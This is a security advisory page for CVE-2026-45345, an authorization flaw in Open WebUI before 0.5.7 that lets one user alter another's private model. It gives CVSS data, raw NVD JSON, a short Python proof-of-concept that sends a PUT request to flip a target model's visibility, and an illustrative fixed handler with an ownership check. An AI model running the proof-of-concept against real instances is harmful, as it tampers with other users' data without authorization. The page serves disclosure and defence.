Security Vulnerability Report
CVE-2026-45345 CVSS 6.5 MEDIUM

Published: 2026-05-15 22:16:55
Last Modified: 2026-05-15 22:16:55

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

Open WebUI < 0.5.7 (fixed in 0.5.7)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL and API endpoint
url = "http://target-open-webui-instance/api/models/{target_model_id}"

# Attacker's session cookie after login
cookies = {
    "access_token": "attacker_jwt_token"
}

# Payload to modify the model visibility
# Exploiting the lack of ownership check to change permissions
payload = {
    "name": "Target Model Name",
    "visibility": "public",  # Changing from private to public
    "description": "Modified by attacker"
}

try:
    response = requests.put(url, json=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] Exploit successful! Model permission modified.")
        print(response.json())
    else:
        print("[-] Exploit failed.")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")
```
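On the server side, the defect is an update handler that never checks who owns the record before applying changes. The following is an added illustration, not Open WebUI's code: it models that pre-fix handler next to one that authorizes the caller first and restricts which fields can be changed. The User and Model shapes, the visibility field, the admin role and the in-memory store built by make_store are assumptions for the example.

```python
# Added illustration, not Open WebUI's code: a minimal model-update handler
# with the missing ownership check this CVE describes, next to the check
# that closes it. Field names and the in-memory store are assumed.
from dataclasses import dataclass

@dataclass
class User:
    id: str
    role: str = "user"

@dataclass
class Model:
    id: str
    user_id: str               # owner of the model
    name: str
    visibility: str = "private"

class Forbidden(Exception):
    pass

EDITABLE = {"name", "visibility"}   # never user_id: ownership is not reassignable

def make_store():
    # Constructed sample data: alice owns a private model.
    return {"m1": Model(id="m1", user_id="alice", name="alice's model")}

def update_model_vulnerable(store, actor, model_id, changes):
    # Pre-fix shape of the bug: existence is checked, ownership is not.
    model = store[model_id]
    for key, value in changes.items():
        setattr(model, key, value)
    return model

def update_model_fixed(store, actor, model_id, changes):
    # Authorize against the stored record before touching any field.
    model = store[model_id]
    if actor.role != "admin" and model.user_id != actor.id:
        raise Forbidden(f"{actor.id} is not the owner of {model_id}")
    unknown = set(changes) - EDITABLE
    if unknown:
        raise ValueError(f"fields not editable: {sorted(unknown)}")
    for key, value in changes.items():
        setattr(model, key, value)
    return model

def attempt(handler, store, actor, model_id, changes):
    # Outcome as a string so both handlers can be compared side by side.
    try:
        handler(store, actor, model_id, changes)
        return "modified"
    except Forbidden:
        return "forbidden"
```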

References

- Advisory: https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp
- Weakness: CWE-285 (Improper Authorization)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-45345",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T22:16:54.923",
    "lastModified": "2026-05-15T22:16:54.923",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-285"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp",
        "source": "[email protected]"
      }
    ]
  }
}
```